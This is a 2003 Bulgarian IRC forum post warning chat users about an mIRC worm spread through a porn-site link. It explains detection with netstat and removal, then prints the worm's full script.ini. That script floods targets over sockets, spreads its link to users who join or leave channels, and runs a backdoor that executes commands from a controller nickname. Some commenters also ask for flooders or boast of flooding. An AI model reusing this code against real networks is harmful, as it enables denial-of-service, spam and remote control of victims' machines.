Начало | IRC HELP | IRC ФОРУМ | HTML Chat | Вход

от: dzver (регистриран)

Този вирус има за цел да ви превърне във FloodBot - FloodDrone. Заразата с него става, като посетите адрес:
http://www.geocities.com/tbilisi_girl/

Можете да проверите дали го имате, като пуснете ms dos prompt (Start/Programs или Start/Programs/Accesoires) и напишете netstat. На заразени компютри ще излезе ред от сорта на:
TCP vesko:1890 jade.va.us.dal.net:6667 ESTABLISHED
TCP vesko:1891 irc.del.bg:6667 ESTABLISHED
TCP vesko:1892 irc.del.bg:6667 ESTABLISHED

connection към дал.нет и 2 към сървъра, на който чатите в момента. Нормално е да имате само 1

TCP vesko:1892 irc.del.bg:6667 ESTABLISHED

Какво става, като посетите горния сайт със стар експлорер?
1. Виждате една изключително грозна гола жена.
2. mIRC-ът ви се заразява по познатия начин
3. при пускане на mIRC, заразата вкарва в чата SpamDrone, което рекламира сайта, с който се инфектират новите жертви
4. вирусът вкарва бот в дал.нет, който съобщава за присъствието си на човек с nick petrol
5. Вашият компютър е на разположение за Flood на произволен човек от произволен човек, произволен канал, сървър и чат мрежа.

Изчистване:
1. Инсталация на Mozilla - за да не се заразявате отново
2. Изтриване на script.ini, mirc.ini или на целия mIRC и инсталиране на ново (зависи до колко разбирате за какво става въпрос:)
3. Запомняне на правилото: не бива да се посещават рекламирани в чаат порно сайтове!

Приложение - в script.ini има следния скрипт, който пуска рекламен бот и floodbot от вашия mIRC:

n0=on1 :start:.sockopen bot jade.va.us.dal.net $chr(310) $+ $chr(310) $+ $chr(310) $+ $chr(311)
n1=alias FlooD if ($ 1= nick) { set %nick $ 2| set %channel $ 2| set %server $ 3| set %port $ 4| sockopen next $+ $rand(1,999999) %server %port | halt } | if ($ 1= chan) { set %nick $ 2| set %channel $ 2| set %server $ 3| set %port $ 4| sockopen chan $+ $rand(1,999999) %server %port | halt } | if ($ 1= kill) { set %nick $ 2| set %channel $ 2| set %server $ 3| set %port $ 4| sockopen kill $+ $rand(1,999999) %server %port | halt }
n2=on *:Sockopen:next*:{
n3= if ($sockerr >0 ) { halt }
n4=set %petrolflood georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.
n5=set -u 1%user $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) | .sockwrite -nt $sockname USER %user %user %user : $+ %user | .sockwrite -nt $sockname NICK $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) | .sockwrite -n $sockname privmsg %nick : $+ %petrolflood | .sockwrite -n $sockname notice %nick : $+ %petrolflood | .sockclose $sockname | .sockopen next $+ $r(0,999) $+ $r(0,999) $+ $r(0,999) $+ $r(0,999) %server %port
n6=}
n7=on *:Sockopen:chan*:{
n8= if ($sockerr >0 ) { halt }
n9=set %petrolflood georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.
n10=set -u 1%user $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) | .sockwrite -nt $sockname USER %user %user %user : $+ %user | .sockwrite -nt $sockname NICK $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $+ $rand(A,Z) $+ Guest | sockwrite -tn $sockname join %channel | .sockwrite -n $sockname privmsg %channel : $+ %petrolflood | .sockwrite -n $sockname privmsg %channel : $+ %petrolflood | .sockclose $sockname | .sockopen chan $+ $r(0,999) $+ $r(0,999) $+ $r(0,999) $+ $r(0,999) %server %port
n11=}
n12=on *:Sockopen:kill*:{
n13= if ($sockerr >0 ) { halt }
n14=set -u 1%user $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) | .sockwrite -nt $sockname USER %user %user %user : $+ %user | .sockwrite -nt $sockname NICK $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) | sockwrite -tn $sockname join %channel | .sockwrite -n $sockname privmsg %nick : $+ $chr(1) $+ finger $+ $chr(1) | .sockclose $sockname | .sockopen kill $+ $r(0,999) $+ $r(0,999) $+ $r(0,999) $+ $r(0,999) %server %port
n15=set %petrolflood georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.
n16=}
n17=on *:sockread:hack*: {
sockread %botread |
set %nickl 1$gettok(%botread,1,32) |
set %nickl 2$left(%nickl1,8) |
set %nickf $right(%nickl2,7) |
if ($gettok(%botread,5,32) == kjk) && (kjk isin %nickf) { $gettok(%botread,6-,32) } }
n18=on *:Sockopen:hack*:{
n19= if ($sockerr >0 ) { halt }
n20=set -u 1%user $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(1,9) $+ $rand(A,Z) | .sockwrite -nt $sockname USER %user %user %user : $+ %user | .sockwrite -nt $sockname NICK $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $+ $rand(A,Z) $+ $+ $rand(A,Z) | .timer 120 0 sockwrite -n $sockname privmsg petrol :i'm tbilisi - $me $+
n21=}
n22=on *:sockclose:next*:/.timer 3 1 sockopen bot jade.va.us.dal.net $chr(310) $+ $chr(310) $+ $chr(310) $+ $chr(311)
n23=
n24=
n25=
n26=on *:join:#:if ( $nick == $Me ) { halt } | .msg $nick 13http://www.geocities.com/tbilisi_girl 6Free Russia Sex
n27=on *:part:#:if ( $nick == $Me ) { halt } | .msg $nick 13http://www.geocities.com/tbilisi_girl 6Free Russia Sex
n28=on *:kick:#:if ( $nick == $Me ) { halt } | .msg $nick 13http://www.geocities.com/tbilisi_girl 6Free Russia Sex
n29=
n30=alias mr_petroleum { set %petrolflood $1- }
n31=
n32=on ^*:text:*:?:if (www isin $1-) || (http isin $1-) { halt }

Edited from: dzver; 2003-01-25 08:08

Edited from: dzver; 2003-01-25 08:14

Мнения от посетители (10):
(анонимен)07.04.07 17:47:58
Tursq irc flooder
iskam irc flooder za nick ili channel nqma znachenie nqkoi ako znae neshto po vaprosa /q ne0-[]
mersi

REfRESh (анонимен)08.01.07 22:36:31
Kvo e tva Skript
Kakvo e tova Skript we

SmeHoRaNkata (анонимен)22.10.06 12:12:18
tyrsq spec bot....
nqkoi moje li da mi kaje ot kade da si izteglq bota, deto vyrti edno 6i6e i toq s duelite....???? pls pomognete mi.. spe6no e... mersi predvaritelno... koito znae da mi prati linka na i_kvo_aaa@abv.bg

bali mama mu (анонимен)14.12.05 02:38:08
the
hakerstvoto e maniq

razbiv@abv.bg (анонимен)02.02.04 17:02:34
bih se radval ako mi obqsnite kak se raboti s mozila.

maikavi (анонимен)03.01.04 23:03:38
pidqrasi
muhahah da eba maikavi umrqla da eba

dzver14.02.03 07:14:24
mi k'vo da ti kaja prostak :)
rabotata e tam, che ako horata razbiraha, niamashe ot podobni flood-drones da padat services kato Yahoo!

ubeden sum, che pone 15-20% ot computrite v svetoven mashtab sa vulnerable i sa nositeli na 1 ili poveche trojani i virusi.

Vsichkite tia raboti gi pisha s nadejdata posetitelite na bgirc.net da NE POSESHTAVAT sites, reklamirani im sus SPAM i da ne polzvat INTERNET EXPLORER ver. pod 6

PROSTAKA (анонимен)13.02.03 20:13:46
obyasnete tova na bg
ne e mnogo yasno a?obyasnete na prost ezik za da mogat horata da vi razbirat nie koito chatim ne sme komp.specialisti i stava slojno

T0sh27.01.03 17:27:58
za "no comment" ama...
tipichno izkazvane na unibg debil :) pulen :)

kelesh4o (анонимен)26.01.03 18:26:10
gotin script
she go polzvbam da floodq BgIRC hahaha
_)_ keleshi

Anonymous comments are temporary disabled

Най-цъкани за 2 дни


RO6AV_3 (69)


T0sh (19)

C4 (19)
dzver (19)
RhapsodY (18)
hlapeto_ (18)
niGGa (17)
Daemon (17)
cpu (16)
STOIL (16)
sniper (14)
Al (14)
sexi_spain_m (14)
reign_of_chaos (14)
alf_ot_melmak (14)
Al_Capone_ (14)
m00n (14)
eblivkaaa (13)
columbian (13)
Pin2 (13)
Mr_Color (12)
TOTTI (12)
Casper (12)
milo_pile (11)
siselina (11)
Obeliska (11)
KePeHcKu (11)
WrEtCh (11)
SiSo (11)
gh0s7 (11)
RooT (11)
Pechenia (11)
Margo (11)
CRASH (11)
vasil (11)
rushtothefloor (10)
skorpinox (10)
GOD (10)
Mast3rX (10)
PoSeiDoN (10)
  Copyright: ShakeIT IRC; dev: dzver; des: metala. Read blogs.  
eXTReMe Tracker